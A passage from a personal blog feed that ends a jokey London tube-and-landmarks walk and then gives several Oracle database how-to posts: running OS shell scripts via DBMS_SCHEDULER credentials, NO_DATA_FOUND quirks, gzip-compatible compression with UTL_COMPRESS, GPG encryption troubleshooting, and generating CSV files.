The Battle of Cable Street has become a touchstone event in the history of British Socialism. Soon after the event, the support for the British Union of Fascists dissipated and they were never a force in British politics.
In Cable Street itself, there is now a mural depicting the event :

At this point in our journey, we have a choice of two termini. Given we’re not in any particular hurry, we can have a look at both. Let’s start with Tower Gateway.

Tower Hill

As you come out of the station, you find yourself in the middle of an awful lot of History.
Standing next to the iconic Tower Bridge, is the Tower of London – built by William the Conqueror as a none-too-subtle reminder to his new subjects that he wasn’t known as William the Bastard for nothing.

Through the crowds of tourists, it may be possible to spot more TV historians than you’d find on a Friday night on BBC4, all vying to do their piece-to-camera about events taking place here in their particular period of interest.
Yes, that may well be Dan Snow and David Starkey playing rock-paper-scissors to find out who gets to film once Lucy Worsley has finished her bit about the fate of some runner-up in a Tudor power struggle.
You may not spot Mary Beard because she’s wisely avoided the crush and has popped to the pub to meet up with David Olusoga. We’ll be following in Mary’s footsteps shortly.

First though, we should pay a quick visit to what is, for the moment at least, the City’s only public “statue” of a rather notable Prime Minister – Margaret Thatcher.
Statue is stretching it a bit. Maggie was always someone who polarised opinion, a fact which gives some context to this depiction of her on the Tower Hill Sundial

There is a salutary lesson here and one that will be re-enforced later in our odyssey through the City. If you want to be commemorated in statuary, then good PR is more important than good (or even notable) deeds.

For now though, if you’ve worked up a thirst with all this history, I know just the place. Just around the corner from the sundial is The Hung Drawn and Quartered.
Apart from the name, the pub is unusual in that it has this excerpt from Samuel Pepys’ diary on one of it’s outside walls :

Whilst we’re sitting outside the pub, enjoying our drinks in the uncharacteristic sunshine, we may reflect on the unusual shape of the skyline. Indeed, there seems to have been a shortage of spirit-levels in recent years as none of the newer skyscrapers seem to have straight sides that are the same height.
They do however, all have nicknames. There’s The Shard, The Cheese Grater, and the one that people are unaccountably relieved to learn, is known as The Pepper Pot.
From our current vantage point we can see another of this new breed – The Walkie-Talkie. Maybe architects frequent this pub as well as historians ? If so, we might form an alternative hypothesis to the spirit-level shortage theory…

looksh shtrait to me !

Before we get too comfortable – this is Central London after all and at these prices we can’t afford to make a night of it – we need to return to Shadwell. This time, we’ll try the other leg of the DLR, which takes us down to the deepest platforms on the tube network – Platforms 9 and 10 at Bank Station.

Bank

Bank is named after The Bank of England. Indeed, the station’s Central Line platforms are full of commuters at rush hour, most of whom are unaware that they are standing next to (and partially under) the Bank’s vaults.

Rather than speculating just how much gold is almost within touching distance, we’re going to a different tube line in the station.

The Waterloo and City line is probably the easiest railway line you to navigate as you’ll have to try quite hard to miss your stop.

Since 1898 this line has transported commuters between London’s traditional financial district and it’s busiest station.
Once at Waterloo, you may be tempted to pop out and take a quick glance at The London Eye – a giant ferris wheel that was built for the Millennium and is the first landmark to be destroyed in any disaster movie in which London appears, however briefly.
I’ve got no time for that however, I need to jump on the Jubilee Line and get across The River to…

Westminster

We emerge from Westminster Station at the North end of Westminster Bridge. We’re right next to the Houses of Parliament in fact. But hey, it’s not like we’re tourists or anything so rather than checking our watches against Big Ben, we can focus on the ladies in the chariot at the end of the bridge.
Here we have an object lesson in the value of positive public perception when it comes to being immortalised in bronze.
Boudicca – for she is the Charioteer in question – is famous for leading a rebellion against the Romans. She also left something of a mark when she last visited London.
In fact, archaeologists have found a layer of burnt debris from 62 A.D. when Boudicca went for an epic night on the town…and burned it to the bedrock.

From this formidable lady, we’re going to pop round the corner, sauntering past another individual who has benefited from centuries of positive spin.
King Richard (the Lionheart), is sitting there on his horse, right outside Parliament.
Richard spent only six months of his eleven year reign in England itself. The rest of the time was spent fighting costly foreign wars and being held for ransom on the way home by people he’d upset on the way to said wars. Essentially, his reign seems to have been a twelfth century version of lads on tour – go abroad somewhere hot, smash the place up and then get your relatives back home to stump up your bail money.

Eventually we arrive at one of the few public statues in the City that is probably more famous for the artist than the subject – Rodin’s Burghers of Calais.

Now, if you were so inclined, you might continue your journey up Whitehall, to Trafalgar Square, where Nelson sits atop his column and surveys the city. But some of us have a train to catch.
Returning to Westminster Station, we’re back on the Jubilee Line for a couple of stops until we alight at…

Baker Street

Baker Street Station is one of the oldest on the tube network, opening in 1863 as part of the then Metropolitan Railway.
221b Baker Street is, of course, the residence of Sherlock Holmes and references to the famous literary detective are prominent in the decor.
There are excerpts from some of the Sherlock Holmes stories on the Jubilee Line platforms…

…as well as some rather unusual decoration on the Bakerloo Line…

But wait – there is no 221b Baker Street and what’s more, there never has been. Some sleuthing is required to track down the actual whereabouts of the Great Man’s abode. Fortunately, it’s on of our way…

Euston

The last leg of our journey takes us on the Hammersmith and City line to Euston Square, from where it’s a short walk to the main Euston Station and the train home to Milton Keynes.
But if we take a short detour down Gower Street we come across a familiar site…

Cup of tea, Watson ?

This is the building that was used as 221b Baker Street in the Sherlock TV series starring Benedict Cumberbatch. It’s actually in North Gower Street.
As the blue plaque proclaims, it was once the home of Italian nationalist Giuseppe Mazzini.

All that remains now is to wander into Euston Station itself and hope that the trains are running OK.

Acknowledgements

Most of the photos I used here were taken by me at various times. There are a couple I got from Wikimedia Commons.
They are :

Running a shell script from inside an Oracle database using DBMS_SCHEDULER

Wed, 2020-05-27 12:11

As I write, various parts of the United Kingdom are still under variations of the theme of “lockdown”. Not that I’m stir crazy or anything but I’ve now decided it’s time to explore one way of escaping, from the confinements of my database, at least.

Specifically I’m going to :

  • create an OS user on the database server
  • create an OS group to allow both the new user and the oracle user to access to a common location
  • create a shell script owned by the OS user which writes to that common location
  • create a credential to access that user from inside the database itself
  • setup and run a scheduler job to execute a shell script as the new OS user
  • read the output file generated by the shell script from inside the database

For this exercise, I’m using my trusty 18cXE database running on CentOS…

Setting up the Linux User

Note that my database settings are defaulted so that, when my application needs to do anything on the OS ( e.g. read a file via an external table), it will do so as the OS user oracle.
This may be different on your database, especially if someone has specified a different user in the PDB_OS_CREDENTIAL parameter.

First of all, I’m going to create a group :

sudo groupadd app_out

…and then the OS user (setting a password) …

useradd -m xerunner
passwd xerunner (xerunner)

…before assigning both the new xerunner and existing oracle users to the new group :

usermod -G app_out xerunner
usermod -G app_out oracle

I’ll now create a directory under $ORACLE_BASE and change the directory’s group to app_out, and ensure that group members have full access to the directory :

sudo su oracle
mkdir app_script_output

chgrp app_out app_script_output
chmod g+w app_script_output
ls -ld app_script_output
drwxrwxr-x 2 oracle app_out 6 May 24 21:32 app_script_output/

To test this, we can connect as the new xerunner user :

sudo su xerunner
touch /opt/oracle/app_script_otuput/silly.txt
ls -l /opt/oracle/app_script_output/silly.txt

-rw-rw-r-- 1 xerunner xerunner 0 May 24 21:36 silly.txt

Now for the shell script we’re going to call from inside the database. Just to demonstrate that the oracle user does not require execute permissions on the script, we’ll create it in as xerunner in that user’s home directory. The script is called message.sh :

#!/bin/sh
/bin/echo "Help, I'm trapped inside this database!" >/opt/oracle/app_script_output/message.txt
exit 0

We can see that permissions are fairly restricted, with others (which includes oracle), having only read access :

ls -l /home/xerunner/message.sh 
-rwxrw-r-- 1 xerunner xerunner 114 May 24 21:42 /home/xerunner/message.sh

Now we’ve completed the setup on the OS, we need to return to the database.

Creating a credential

We need to create a Credential object in Oracle. This will allow us to connect to the database server as xerunner without having to know any of the gory details ( such as the user’s password).
Back in the olden days (when only cats did social distancing), credential management was handled in the DBMS_SCHEDULER package.
Since 12c, the DBMS_CREDENTIAL package has assumed this role.

First up, let’s create our credential :

begin
    dbms_credential.create_credential(
        credential_name => 'myapp_ext_jobs',
        username => 'xerunner',
        password => 'super secret password');
end;
/

…where super secret password is the password for the xerunner user on the OS.

You can include a comment when creating a credential. In hindsight, that might have been a good idea.
Fortunately, I can edit the credential rather than having to drop and re-create it…

begin
    dbms_credential.update_credential( 
        credential_name => 'myapp_ext_jobs', 
        attribute => 'comments', 
        value => 'OS User to execute shell scripts from scheduler jobs');
end;
/

I can see details of my credentials by querying the appropriate data dictionary view :

select username, comments
from user_credentials
where credential_name = 'MYAPP_EXT_JOBS';

USERNAME        COMMENTS                                               
--------------- -------------------------------------------------------
xerunner        OS User to execute shell scripts from scheduler jobs   

One other point to note, in the aforementioned olden days, it was possible to retrieve the password of a credential by using DBMS_ISCHED.GET_CREDENTIAL_PASSWORD. See Martin Berger’s explanation here for details.

In 18c however, this is no longer the case.

Running the shell script from a Scheduler Job

Scheduler jobs are extremely useful for doing all sorts of things, not just running – well – scheduled jobs.
In this case we want to run the shell script. To do this, we first create a job :

begin
    dbms_scheduler.create_job(
        job_name => 'my_external_job',
        job_type => 'EXECUTABLE',
        job_action => '/home/xerunner/message.sh',
        credential_name => 'MYAPP_EXT_JOBS',
        auto_drop => false,
        enabled => true);
end;
/

… and now we can run it :

begin
    dbms_scheduler.run_job( 'my_external_job');
end;
/

Note that, by default, RUN_JOB executes the specified job in the current session – i.e. in the foreground.
We can check that the job has been successful by connecting to the OS and looking in the appropriate directory….but that’s boring. Let’s have a look without leaving the comfort of our database.

Reading the file

First, we need to create a directory object for the OS directory in question. This shouldn’t be a problem because we already know that the oracle OS user has permissions on the directory on the OS :

create directory app_script_out
    as '/opt/oracle/app_script_output'
/

Then we can just read the file :

declare
    fdir all_directories.directory_name%type := 'APP_SCRIPT_OUT';
    fname varchar2(128) := 'message.txt';
    fh utl_file.file_type;
    buf varchar2(32767);
    
    fexists boolean;
    flen number;
    bsize number;
    
begin
    -- Make sure the file is where we think it is before we try to open it...
    utl_file.fgetattr( fdir, fname, fexists, flen, bsize);
    if not fexists then
        raise_application_error(-20000, q'[Hold up, the file isn't there]');
    end if;
    
    fh := utl_file.fopen(fdir, fname, 'r', 32767);
    begin
        -- Read and print each line in a nested block.
        -- NO_DATA_FOUND will be raised when we hit the end of the file
        loop
            utl_file.get_line(fh, buf, 32767);
            dbms_output.put_line(buf);
        end loop;
    exception when no_data_found then
        dbms_output.put_line('End of file reached');
        utl_file.fclose(fh);
    end;
end;
/

Help ! I'm trapped inside this database !
End of file reached


PL/SQL procedure successfully completed.

No Data ? No Problem ! Fun and Games with the NO_DATA_FOUND exception

Wed, 2020-05-06 14:29

I can’t remember how long we’ve been in lockdown now but between you and me, I think my Oracle Database may be cracking up.
As Exhibit A, I present the fact that RDBMS seems to raise the NO_DATA_FOUND exception only when it feels like it…

Rotate the Pod please, HAL

NO_DATA_FOUND is one of Oracle’s built-in exceptions and is raised when your code encounters an ORA-01403 : no data found error.
It’s often associated with a select into clause, as this construct will (should) return a single row.
If it doesn’t it should cause either a TOO_MANY_ROWS or a NO_DATA_FOUND exception, depending on whether it’s found multiple rows, or couldn’t find any…

set serverout on size unlimited
clear screen

declare
    mystring varchar2(100);
begin
    select 'I am completely operational, and all my circuits are functioning perfectly'
    into mystring
    from dual
    where 1 = 2;
end;
/

Run this and you will get the aforementioned error :

ORA-01403: no data found
Open the Pod Bay doors, HAL

Let’s go right ahead and create a function with this code :

create or replace function stir_crazy return varchar2 is
    mystring varchar2(100);
    begin
        select 'I am completely operational, and all my circuits are functioning perfectly'
        into mystring
        from dual
        where 1 = 2;
        
        return mystring;
end stir_crazy;
/

We’ve not added any exception handling in the function so the error should propogate back to the caller…

select nvl(stir_crazy, q'[I'm afraid I can't do that, Dave]') as stir_crazy from dual;

STIR_CRAZY                              
----------------------------------------
I'm afraid I can't do that, Dave

That’s right. Rather than raising an ORA-01403 error, Oracle has simply returned NULL.
Have I just made some silly mistake in the code ? Let’s check. This time, we’ll handle the exception, if it’s raised…

begin
    if stir_crazy = null then
        dbms_output.put_line('Daisy, Daisy, give me your answer, do !');
    else
        dbms_output.put_line('Just what do you think are you doing, Dave ?');
    end if;
exception when no_data_found then
    dbms_output.put_line(q'[I've still got the greatest enthusiasm and confidence in the mission]');
end;
/

Run this and we can see that the exception is now raised…

I've still got the greatest enthusiasm and confidence in the mission


PL/SQL procedure successfully completed.
I’ve just picked up a fault in the AE-35 unit

It turns out that Oracle has always behaved in this way.

According to this explanation, NO_DATA_FOUND is not an error when encountered from SQL, merely an “exceptional condition”.

I honestly think you ought to sit down calmly, take a stress pill, and think things over

This may be no more than an interesting quirk, depending on what is considered as SQL in this context…

As an example, let’s look at the HR.COUNTRIES table :

select country_id, country_name, region_id
from countries;

COUNTRY_ID      COUNTRY_NAME                         REGION_ID
--------------- ------------------------------ ---------------
AR              Argentina                                    2
AU              Australia                                    3
BE              Belgium                                      1
BR              Brazil                                       2
CA              Canada                                       2
CH              Switzerland                                  1
CN              China                                        3
DE              Germany                                      1
DK              Denmark                                      1
EG              Egypt                                        4
FR              France                                       1
IL              Israel                                       4
IN              India                                        3
IT              Italy                                        1
JP              Japan                                        3
KW              Kuwait                                       4
ML              Malaysia                                     3
MX              Mexico                                       2
NG              Nigeria                                      4
NL              Netherlands                                  1
SG              Singapore                                    3
UK              United Kingdom                               1
US              United States of America                     2
ZM              Zambia                                       4
ZW              Zimbabwe                                     4

25 rows selected. 

The REGION_ID references the REGIONS table :

select region_id, region_name
from regions;

 REGION_ID REGION_NAME                   
---------- ------------------------------
         1 Europe                        
         2 Americas                      
         3 Asia                          
         4 Middle East and Africa        

…and we have a lookup function to return the Region Name name for each id value…

create or replace function get_region_name( i_region_id in regions.region_id%type)
    return regions.region_name%type
is
    rtn regions.region_name%type;
begin
    select region_name into rtn
    from regions
    where region_id = i_region_id;
    
    return rtn;
end;
/

Now let’s add in a record that includes a region_id value that will not be found by the function
(yes, I have disabled the Foreign Key that would normally prevent this)…

insert into countries( country_id, country_name, region_id)
values( 'NZ', 'New Zealand', 5);

As we’ve already observed, calling the function from SQL will simply cause a null value to be returned…

select country_name, get_region_name( region_id) as region_id
from countries
where country_id = 'NZ';

COUNTRY_NAME                   REGION_ID      
------------------------------ ---------------
New Zealand                                   

If we now call the function from inside a PL/SQL block, we might expect NO_DATA_FOUND to make an appearance…

set serverout on size unlimited
begin
    for r_countries in (
        select country_name, get_region_name( region_id) as region_id
        from countries)
    loop
        dbms_output.put_line( r_countries.country_name||' Region : '||r_countries.region_id);
    end loop;
end;
/

or possibly not…

Argentina Region : Americas
Australia Region : Asia
Belgium Region : Europe
Brazil Region : Americas
Canada Region : Americas
Switzerland Region : Europe
China Region : Asia
Germany Region : Europe
Denmark Region : Europe
Egypt Region : Middle East and Africa
France Region : Europe
Israel Region : Middle East and Africa
India Region : Asia
Italy Region : Europe
Japan Region : Asia
Kuwait Region : Middle East and Africa
Malaysia Region : Asia
Mexico Region : Americas
Nigeria Region : Middle East and Africa
Netherlands Region : Europe
Singapore Region : Asia
United Kingdom Region : Europe
United States of America Region : Americas
Zambia Region : Middle East and Africa
Zimbabwe Region : Middle East and Africa
New Zealand Region :


PL/SQL procedure successfully completed.

However, if we call the function from a PL/SQL statement then we get a different result :

set serverout on size unlimited
begin
    for r_countries in (
        select country_name, region_id
        from countries)
    loop
        dbms_output.put_line( r_countries.country_name||' Region :'||get_region_name( r_countries.region_id));
    end loop;
end;
/

ORA-01403: no data found
ORA-06512: at "MIKE.GET_REGION_NAME", line 6

Looks like I’m the one cracking up.
The moral of the story ? Don’t rely on NO_DATA_FOUND being raised unless you are executing a PL/SQL statement.

To Boldly gzip from PL/SQL

Tue, 2020-04-28 15:10

Lempel-Ziv. Sounds like something you might find on a starship. I mean, you can just imagine Scotty telling Kirk that they can’t go to warp because the Lempel-Ziv compressors are offline.
In fact, the Lempel-Ziv algorithm is what GNU’s Gzip program uses to compress files.
Fortunately, the UTL_COMPRESS package employs the same algorithm, which means that you can create archives using one tool that can be manipulated by the other…

Starfleet HR have generated a delimited file of their Captains from their Oracle database for loading into their data mart, which runs on a different server ( and doesn’t use Oracle).
This file needs to be compressed to make the transfer as efficient as possible.
At present, the file looks like this on the database server :

ls -l starfleet_captains.csv
-rw-r--r-- 1 oracle oinstall 343 Apr 26 15:49 starfleet_captains.csv
Compressing the file

Using UTL_COMPRESS, we can easily create a .gz archive from the file…

declare
    l_dir all_directories.directory_name%type := 'APP_FILES';
    fname varchar2(100) := 'starfleet_captains.csv';

    src_file bfile;
    lz_compressed blob;
    lz_compressed_len integer;
    fh utl_file.file_type;
    
    v_buffer raw(32767);
    buf_size pls_integer := 32767;
    v_pos integer := 1;
begin

    src_file := bfilename( l_dir, fname);
    dbms_lob.fileopen(src_file, dbms_lob.file_readonly);
    
    lz_compressed := utl_compress.lz_compress( src_file, 9); 
    lz_compressed_len := dbms_lob.getlength( lz_compressed);
    
    fh := utl_file.fopen( l_dir, fname||'.gz', 'wb');
    
    while v_pos < lz_compressed_len loop
        dbms_lob.read( lz_compressed, buf_size, v_pos, v_buffer);
        utl_file.put_raw( fh, v_buffer, true);
        v_pos := v_pos + buf_size;
    end loop;
    utl_file.fclose(fh);
    -- Now need to delete original
    utl_file.fremove(l_dir, fname);
end;
/

The LZ_COMPRESS function accepts two arguments. The first is the file we’re compressing.
The second is the “quality” – a number between 1 and 9 with 1 being the fastest execution, but least compression, and 9 being the greatest compression and the slowest execution.
We’ll come back to that shortly.
In the meantime, we can see that our delimited file has now been replaced with a compressed file…

ls -l starfleet_captains*
-rw-r--r-- 1 oracle oinstall 242 Apr 26 15:58 starfleet_captains.csv.gz

…which can now be manipulated using gzip…

gzip -l starfleet_captains.csv.gz 
         compressed        uncompressed  ratio uncompressed_name
                265                 343  34.7% starfleet_captains.csv

…and indeed, gunzip…

gunzip starfleet_captains.csv.gz

cat starfleet_captains.csv

CAPTAIN|SHIP
Archer|Enterprise NX-01
Hernandez|Columbia NX-02
Decker|USS Enterprise
Georgiou|USS Shenzou
Kirk|USS Enterprise
Lorca|USS Discovery
Pike|USS Enterprise
Styles|USS Excelsior
Terrell|USS Reliant
Tracey|USS Exeter
Adams|USS Heart of Gold
Janeway|USS Voyager
Picard|USS Stargazer
Sisko|USS Defiant
Thomas|USS Puget Sound
ROW_COUNT|15

Incidentally, some of this data does raise questions.
For example, what’s so special about Puget Sound that it gets a Starship as well as an Oracle User Group ?
Also, was Janeway overlooked for the command of the Heart of Gold because she’s not a tea drinker ?
Full disclosure : that wasn’t my geeky reference to Hitchicker’s Guide to the Galaxy. I got these ships and captains from a Star Trek Wiki.

Coming back to more immediate questions, how does UTL_COMPRESS perform with different compression settings for larger files…

Performance test

Let’s generate a more substantial file (using William Robertson’s CSV package)…

declare
    rc sys_refcursor;
begin
    open rc for
        select rownum as id,
            case mod( rownum, 8) 
                when 1 then 'Archer'
                when 2 then 'Pyke'
                when 3 then 'Georgiou'
                when 4 then 'Lorca'
                when 5 then 'Kirk'
                when 6 then 'Picard'
                when 7 then 'Sisko'
                when 0 then 'Janeway'
            end as captain,
            case mod(rownum, 8)
                when 1 then 'Enterprise NX-01'
                when 2 then 'USS Enterprise'
                when 3 then 'USS Shenzou'
                when 4 then 'USS Discovery'
                when 5 then 'USS Enterprise'
                when 6 then 'USS Stargazer'
                when 7 then 'USS Defiant'
                when 0 then 'USS Voyager'
            end as ship
        from dual
        connect by rownum < 1000000;
    
    csv.write_file( 
        p_dataset => rc,
        p_separator => chr(124),
        p_heading => 'Y',
        p_rowcount => 'Y',
        p_directory => 'APP_FILES',
        p_filename => 'famous_federation_captains.csv');
end;
/

If we look at the file on disk, we can see that it’s hefty enough for our purposes :

ls -lh famous_federation_captains.csv
-rw-r--r-- 1 oracle oinstall 27M Apr 27 17:31 famous_federation_captains.csv

To start with, let’s try compressing this using the default value for quality (6) :

set timing on
set feedback on
declare
    l_dir all_directories.directory_name%type := 'APP_FILES';
    fname varchar2(100) := 'famous_federation_captains.csv';

    src_file bfile;
    lz_compressed blob;
    lz_compressed_len integer;
    fh utl_file.file_type;
    
    v_buffer raw(32767);
    buf_size pls_integer := 32767;
    v_pos integer := 1;
begin

    src_file := bfilename( l_dir, fname);
    dbms_lob.fileopen(src_file, dbms_lob.file_readonly);
    
    lz_compressed := utl_compress.lz_compress( src_file); 
    lz_compressed_len := dbms_lob.getlength( lz_compressed);
    
    fh := utl_file.fopen( l_dir, fname||'.gz', 'wb');
    
    while v_pos < lz_compressed_len loop
        dbms_lob.read( lz_compressed, buf_size, v_pos, v_buffer);
        utl_file.put_raw( fh, v_buffer, true);
        v_pos := v_pos + buf_size;
    end loop;
    utl_file.fclose(fh);
    -- Now need to delete original
    utl_file.fremove(l_dir, fname);
end;
/

The output is :

PL/SQL procedure successfully completed.

Elapsed: 00:00:00.329

If we examing the compressed file we can see that the compression ratio is around 90% :

ls -lh famous_federation_captains.csv.gz 
-rw-r--r-- 1 oracle oinstall 2.7M Apr 27 17:37 famous_federation_captains.csv.gz
gzip -l famous_federation_captains.csv.gz 
         compressed        uncompressed  ratio uncompressed_name
            2779405            27388901  89.9% famous_federation_captains.csv

Trying this with the quality value set to the minimum (1) :

...
lz_compressed := utl_compress.lz_compress( src_file, 1); 
...

…results in a faster runtime…

PL/SQL procedure successfully completed.

Elapsed: 00:00:00.202

…but a marginally bigger file…

 ls -lh famous_federation_captains.csv.gz 
-rw-r--r-- 1 oracle oinstall 2.9M Apr 27 17:43 famous_federation_captains.csv.gz
gzip -l famous_federation_captains.csv.gz 
         compressed        uncompressed  ratio uncompressed_name
            2994045            27388901  89.1% famous_federation_captains.csv

Finally, let’s go for the maximum quality setting (9) :

...
lz_compressed := utl_compress.lz_compress( src_file, 9); 
...

The runtime is a little longer…

PL/SQL procedure successfully completed.

Elapsed: 00:00:00.393

…and the resulting file is more or less the same as for the default :

ls -lh famous_federation_captains.csv.gz 
-rw-r--r-- 1 oracle oinstall 2.7M Apr 27 17:47 famous_federation_captains.csv.gz
gzip -l famous_federation_captains.csv.gz 
         compressed        uncompressed  ratio uncompressed_name
            2762750            27388901  89.9% famous_federation_captains.csv

Obviously, this is a limited test. I’m running Oracle 18cXE on CentOS. However, it may become a consideration for you if you’re either tight on space or need to speed up your compression job.

Uncompressing GZIPPED files

As we’ve seen, UTL_COMPRESS can produce files that are compatible with GZIP. But can it read files that have been compressed using GZIP ?

Let’s take a look :

 
gzip captains_log.txt
ls -l captains_log.txt.gz 
-rw-rw-rw- 1 oracle oinstall 561 Apr 27 18:00 captains_log.txt.gz

Want to read the Captain’s log ?

set serverout on size unlimited
clear screen
declare
    l_dir all_directories.directory_name%type := 'APP_FILES';
    fname varchar2(100) := 'captains_log.txt.gz';
    zipped_file bfile;
    v_unzipped blob := empty_blob();
    v_text clob;
    
    v_dest_offset integer := 1;
    v_src_offset integer := 1;
    v_lang integer := dbms_lob.default_lang_ctx;
    v_warn integer;
begin
    zipped_file := bfilename( l_dir, fname);
    dbms_lob.fileopen(zipped_file, dbms_lob.file_readonly);

    v_unzipped := utl_compress.lz_uncompress( zipped_file);
    dbms_lob.fileclose(zipped_file);
    -- Now we have the uncompressed contents of the file, let's print it out...
    
    dbms_lob.createtemporary( v_text, true);
    
    dbms_lob.converttoclob(
        dest_lob => v_text,
        src_blob => v_unzipped,
        amount => dbms_lob.lobmaxsize,
        dest_offset => v_dest_offset,
        src_offset => v_src_offset,
        blob_csid => dbms_lob.default_csid,
        lang_context => v_lang,
        warning => v_warn);
   
    dbms_output.put_line(v_text);     

    dbms_lob.freetemporary( v_text);
end;
/

Run this and Kirk’s inner-most thoughts (or possibly the lyrics to Star Trekking by The Firm) are there for all to see…

Acknowledgements

Despite appearances, I do actually do some research before kicking out this stuff.
On this occasion, the following links were of some assistance :

Secrecy and (file) Corruption – diving into the murky world of GPG encryption

Sat, 2020-04-18 10:19

Transferring sensitive data between systems often requires some for of encryption to ensure that the data is protected from prying eyes.
One common method of achieving this is to use Gnu Privacy Guard (GPG).
What I’m going to look at here is :

  • Creating GPG keys on a server
  • Using a Public Key to encrypt data on a different machine
  • Decrypting an encrypted message
  • Things to try if you get some of the more wacky GPG error messages

If you’ve stumbled on this post because of the last of these, you’re in good company. I’m sure someone initimately familiar with this tool will instantly know the meaning of the error message “Ohhhh jeeee: mpi larger than packet” but as far I’m concerned, it may as well have read “Divide by Cucumber Error”.
Hopefully, things will become clearer down the page…

Creating a GPG key

In fact, we’ll be creating two keys. The Public Key is, as it’s name suggests, generally available and anyone wanting to send us a message need only use that key to encrypt it.
The Private key is the one that only we have access to and which we can use to decrypt files encrypted with the Public Key.

To create the keys, we need to be on the server that will receive these files.
Once there, we simply run :

gpg --gen-key

which results in :

NOTE – according to the manual, the default settings are sufficient in most cases so accept them unless you have a specific reason to change them.
For the length of time the key is valid, enter “0” if you don’t want it to expire.
In this case, I’ve selected 7 days.
GPG should now prompt you for a passphrase.
NOTE – it’s really important that you remember the passphrase as otherwise you will not be able to decrypt any messages :

Finally, the keys will be generated :

Distributing the Public Key

Before we go any further, we probably want to obtain a text version of our public key that we can then distribute.
This can be accomplished by running :

gpg --armour --export me@silly.com >ponder_stibbons_public_key.txt

We now have a file that contains our Public Key. It looks like this :

I can now distribute this to anyone who wants to send me an encrypted message.

Using a Public Key to encrypt data on a different machine

I’m now on a different machine onto which I’ve downloaded the public key.
I now need to import it :

gpg --import ./ponder_stibbons_pubkey.txt 

…which returns…

gpg: key 1DA0A003: public key "Ponder Stibbons (Test generation of a GPG key) <ponders@uu.ac.am>" imported
gpg: Total number processed: 1
gpg:               imported: 1  (RSA: 1)

I can get a list of available keys by running :

gpg --list-keys

…which confirms that the key is now present in my keyring :

/home/mike/.gnupg/pubring.gpg
-----------------------------
pub   2048R/1DA0A003 2020-04-09 [expires: 2020-04-16]
uid                  Ponder Stibbons (Test generation of a GPG key) <ponders@uu.ac.am>
sub   2048R/11DC569B 2020-04-09 [expires: 2020-04-16]

We have some data in a file called secret_message.txt that we want to send.
With the recipients public key imported, we can encrypt the file like this :

gpg --encrypt -r ponders@uu.ac.am secret_message.txt

At this point GPG will prompt you to confirm that you want to do this :

gpg: 11DC569B: There is no assurance this key belongs to the named user

pub  2048R/11DC569B 2020-04-09 Ponder Stibbons (Test generation of a GPG key) <ponders@uu.ac.am>
 Primary key fingerprint: 8238 E5BC C165 EA3D A927  39A3 BFFB 64EC 1DA0 A003
      Subkey fingerprint: 1BE6 DCF6 F041 988F D011  A19E F66F FD9F 11DC 569B

It is NOT certain that the key belongs to the person named
in the user ID.  If you *really* know what you are doing,
you may answer the next question with yes.

Use this key anyway? (y/N) y

We now have an encrypted copy of the file…

ls -l secret_message*
-rw-rw-r-- 1 mike mike  36 Apr  9 21:23 secret_message.txt
-rw-rw-r-- 1 mike mike 386 Apr  9 21:26 secret_message.txt.gpg

…which is encrypted :

file secret_message.txt.gpg 
secret_message.txt.gpg: PGP RSA encrypted session key - keyid: 9FFD6FF6 9B56DC11 RSA (Encrypt or Sign) 2048b .

Indeed, the .gpg version of the file contains this :

We can now transfer the encrypted file to the target server.

Decrypting the file

Once the file has reached it’s intended destination it can now be decrypted by the intended recipient using their private key.
Note that in order to do this, they need to know the passphrase used to create the key in the first place :

gpg --batch --yes --passphrase ************ -o secret_message.txt --logger-file secret.log secret_message.txt.gpg

…where ************ is the passphrase.

Once we run this we can see that we have generated a log file, together with the output file :

ls -l secret*
-rw-rw-r-- 1 mike mike 169 Apr  9 21:31 secret.log
-rw-rw-r-- 1 mike mike  36 Apr  9 21:31 secret_message.txt
-rw-rw-r-- 1 mike mike 386 Apr  9 21:29 secret_message.txt.gpg

If all has gone according to plan, the logfile should look something like :

2020-04-09 21:31:11 gpg[6431] encrypted with 2048-bit RSA key, ID 11DC569B, created 2020-04-09
      "Ponder Stibbons (Test generation of a GPG key) <ponders@uu.ac.am>"

Also, we should now be able to read the decrypted contents of the file :

cat secret_message.txt

Out of Cheese Error
Redo from start
When things go horribly wrong

In using GPG, I’ve found that error messages regarding packet sizes can be quite common when you first begin receiving file from a new source system. Perhaps the most cryptic of these is :

Ohhhh jeeee: mpi larger than packet

When this sort of thing crops up it appears to be the result of a file corruption. Either the key file used to encrypt the data, or the encrypted file itself, has somehow become corrupted.
There are at least two common ways for this to happen.

Transferring a text key from Windows to Linux

Remember that, in the example above, we used a text file to distribute our public key.
As you probably know, Windows uses two non-printing characters to terminate a line – Carriage Return (to move the cursor to the start of the line) and Line Feed (to move down to the next line). This means that each new line is preceeded by the ASCII characters 13 and 10.
Linux uses a single new-line character – ASCII 10 – in which the Carriage Return is implicit.
Unfortunately conversion between the two new-lines is not automatic. Therefore, if you find yourself transferring the text copy of a public key from a Windows system to a Linux system then you need to convert the new-lines to Linux using the dos2unix utility before using the key for GPG encryption.
In our example, we’d need to run :

dos2unix ponder_stibbons_pubkey.txt

Note : on the off-chance it’s not already installed, you can install this utility as follows :

On a RedHat-based system (RHEL, CentOS, Fedora etc) :

sudo yum install dos2unix

On a Debian-based system ( Debian, Ubuntu, Mint etc) :

sudo apt-get install dos2unix

One useful aspect of this utility is that it will not alter the file unless it finds new-lines that require changing.

Selecting the file transfer mode over sftp

Unless you are an aged person such as myself, who remembers the time when you’d ftp files on the command line, you probably won’t be aware that ftp ( the forerunner to sftp), had different modes for text files (ascii) and binary files (binary). However, many modern sftp client tools do remember this distinction. Take FileZilla, for example :

As we have seen, GPG encrypted files are binary. If they are transferred in ASCII mode then they will become corrupted and trigger GPG’s packet-size obsession when you try to decrypt them.

If you’re hitting this issue then make sure that your sftp client isn’t being “helpful” by automatically selecting the incorrect transfer mode for your encrypted file.

Using FileZilla as an example, you can specify the correct mode when you invoke a Manual Transfer from the Transfer menu :

Hopefully you should now be free of file corruption and be able to proceed without having to re-initialize your FTB.

Generating CSV files from PL/SQL the Very Easy Way.

Thu, 2020-02-13 15:31

This post is dedicated to Morten Braten and William Robertson.
Thanks to both of you for saving me a lot of time (and typing)…

XML, YAML, JSON. When it comes to transferring data between systems, they’ve all been flavour of the month at one time or another. However, good old CSV is still the format of choice when the batch window opens.
Not only is it simple, it adds comparatively little overhead to the size of the data file being generated.

OK – CSV used to mean “Comma-delimited” but these days it’s become synonymous with delimited data.
Whatever separator character you use, generating CSV is considerably easier these days…unless you’re using PL/SQL in a batch (as opposed to interactive) process.
That said, Connor MacDonald does have a clever way of utilising the functionality available in a command line tool such as SQL*Plus by means of a DBMS_SCHEDULER job.

